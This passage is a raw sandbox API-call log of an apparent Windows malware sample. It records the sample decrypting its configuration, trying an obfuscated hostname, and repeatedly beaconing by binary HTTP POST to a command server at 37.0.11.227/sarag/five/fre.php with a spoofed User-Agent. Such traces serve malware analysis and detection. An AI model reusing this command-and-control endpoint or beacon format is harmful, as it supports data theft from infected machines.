pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0253.745] GetProcessHeap () returned 0x690000 [0253.745] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0253.746] GetProcessHeap () returned 0x690000 [0253.746] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0253.746] GetProcessHeap () returned 0x690000 [0253.747] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0253.747] GetProcessHeap () returned 0x690000 [0253.747] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0253.748] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.748] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0253.753] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.754] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0253.764] GetProcessHeap () returned 0x690000 [0253.764] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0253.765] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.765] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0253.766] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.767] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0253.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.770] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0253.770] GetProcessHeap () returned 0x690000 [0253.771] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0253.772] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.772] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0253.773] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.773] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0253.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.774] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0253.774] GetProcessHeap () returned 0x690000 [0253.774] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0253.775] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.775] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0253.776] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.777] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0253.777] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.778] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0253.781] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.781] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0253.781] GetProcessHeap () returned 0x690000 [0253.781] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0253.781] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0253.781] GetProcessHeap () returned 0x690000 [0253.781] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0253.781] socket (af=2, type=1, protocol=6) returned 0x730 [0253.782] connect (s=0x730, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0253.807] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0253.807] GetProcessHeap () returned 0x690000 [0253.807] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0253.807] GetProcessHeap () returned 0x690000 [0253.807] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0253.808] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0253.809] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0253.809] GetProcessHeap () returned 0x690000 [0253.809] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afc80 [0253.809] GetProcessHeap () returned 0x690000 [0253.810] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0253.810] GetProcessHeap () returned 0x690000 [0253.810] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0253.810] GetProcessHeap () returned 0x690000 [0253.810] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0253.811] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0253.812] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0253.812] GetProcessHeap () returned 0x690000 [0253.812] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0253.812] GetProcessHeap () returned 0x690000 [0253.812] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0253.816] send (s=0x730, buf=0x6ad508*, len=242, flags=0) returned 242 [0253.817] send (s=0x730, buf=0x6aba40*, len=159, flags=0) returned 159 [0253.817] GetProcessHeap () returned 0x690000 [0253.817] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0253.817] recv (in: s=0x730, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0253.894] GetProcessHeap () returned 0x690000 [0253.894] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0253.894] GetProcessHeap () returned 0x690000 [0253.895] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0253.895] GetProcessHeap () returned 0x690000 [0253.896] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afc80 | out: hHeap=0x690000) returned 1 [0253.896] GetProcessHeap () returned 0x690000 [0253.896] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0253.896] closesocket (s=0x730) returned 0 [0253.897] GetProcessHeap () returned 0x690000 [0253.897] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0253.897] GetProcessHeap () returned 0x690000 [0253.897] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0253.897] GetProcessHeap () returned 0x690000 [0253.898] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0253.898] GetProcessHeap () returned 0x690000 [0253.898] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0253.898] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14c4) returned 0x730 [0253.902] Sleep (dwMilliseconds=0xea60) [0253.904] GetProcessHeap () returned 0x690000 [0253.904] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0253.905] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.905] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0253.912] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.912] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0253.920] GetProcessHeap () returned 0x690000 [0253.920] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0253.921] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.921] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0253.924] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.940] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0253.941] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.941] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0253.941] GetProcessHeap () returned 0x690000 [0253.942] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0253.943] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.943] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0253.952] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.953] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0253.954] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.954] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0253.954] GetProcessHeap () returned 0x690000 [0253.954] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0253.955] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.955] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0253.956] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.956] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0253.957] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.957] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0253.958] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.959] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0253.959] GetProcessHeap () returned 0x690000 [0253.959] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0253.959] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0253.959] GetProcessHeap () returned 0x690000 [0253.960] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0253.964] GetProcessHeap () returned 0x690000 [0253.964] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0253.964] GetProcessHeap () returned 0x690000 [0253.964] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0253.964] GetProcessHeap () returned 0x690000 [0253.964] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0253.965] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.966] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0253.971] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.972] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0253.982] GetProcessHeap () returned 0x690000 [0253.982] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0253.986] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.987] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0253.987] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.988] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0253.989] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.989] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0253.989] GetProcessHeap () returned 0x690000 [0253.989] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0253.990] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.991] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0253.992] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.992] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0253.993] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.995] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0253.995] GetProcessHeap () returned 0x690000 [0253.995] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0253.996] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.996] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0253.997] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.998] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0253.998] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.999] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0253.999] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0254.000] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0254.000] GetProcessHeap () returned 0x690000 [0254.000] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0254.000] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0254.000] GetProcessHeap () returned 0x690000 [0254.000] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3f0 [0254.000] socket (af=2, type=1, protocol=6) returned 0x734 [0254.000] connect (s=0x734, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0254.029] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0254.029] GetProcessHeap () returned 0x690000 [0254.029] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0254.029] GetProcessHeap () returned 0x690000 [0254.029] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0254.030] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0254.032] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0254.032] GetProcessHeap () returned 0x690000 [0254.032] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af980 [0254.032] GetProcessHeap () returned 0x690000 [0254.032] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0254.032] GetProcessHeap () returned 0x690000 [0254.032] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0254.032] GetProcessHeap () returned 0x690000 [0254.032] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0254.034] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0254.035] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0254.035] GetProcessHeap () returned 0x690000 [0254.035] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0254.035] GetProcessHeap () returned 0x690000 [0254.035] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0254.035] send (s=0x734, buf=0x6ad508*, len=242, flags=0) returned 242 [0254.036] send (s=0x734, buf=0x6aba40*, len=159, flags=0) returned 159 [0254.036] GetProcessHeap () returned 0x690000 [0254.036] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0254.036] recv (in: s=0x734, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0254.111] GetProcessHeap () returned 0x690000 [0254.111] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0254.111] GetProcessHeap () returned 0x690000 [0254.112] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0254.112] GetProcessHeap () returned 0x690000 [0254.113] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af980 | out: hHeap=0x690000) returned 1 [0254.113] GetProcessHeap () returned 0x690000 [0254.113] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0254.113] closesocket (s=0x734) returned 0 [0254.114] GetProcessHeap () returned 0x690000 [0254.114] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3f0 | out: hHeap=0x690000) returned 1 [0254.114] GetProcessHeap () returned 0x690000 [0254.114] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0254.114] GetProcessHeap () returned 0x690000 [0254.115] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0254.117] GetProcessHeap () returned 0x690000 [0254.118] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0254.118] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14d0) returned 0x734 [0254.120] Sleep (dwMilliseconds=0xea60) [0254.121] GetProcessHeap () returned 0x690000 [0254.121] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0254.122] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0254.123] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0254.158] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0254.158] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0254.173] GetProcessHeap () returned 0x690000 [0254.173] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0254.174] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0254.175] CryptImportKey (in: hProv=0x6af078, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0254.176] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0254.177] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0254.178] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0254.179] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0254.179] GetProcessHeap () returned 0x690000 [0254.179] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0254.184] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0254.188] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0254.189] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0254.189] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0254.190] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0254.190] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0254.190] GetProcessHeap () returned 0x690000 [0254.190] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0254.191] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0254.191] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0254.192] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0254.192] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0254.193] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0254.194] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0254.195] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0254.195] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0254.195] GetProcessHeap () returned 0x690000 [0254.195] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0254.262] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0254.262] GetProcessHeap () returned 0x690000 [0254.263] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0254.265] GetProcessHeap () returned 0x690000 [0254.265] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0254.265] GetProcessHeap () returned 0x690000 [0254.266] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0254.266] GetProcessHeap () returned 0x690000 [0254.266] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0254.267] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0254.267] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0254.273] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 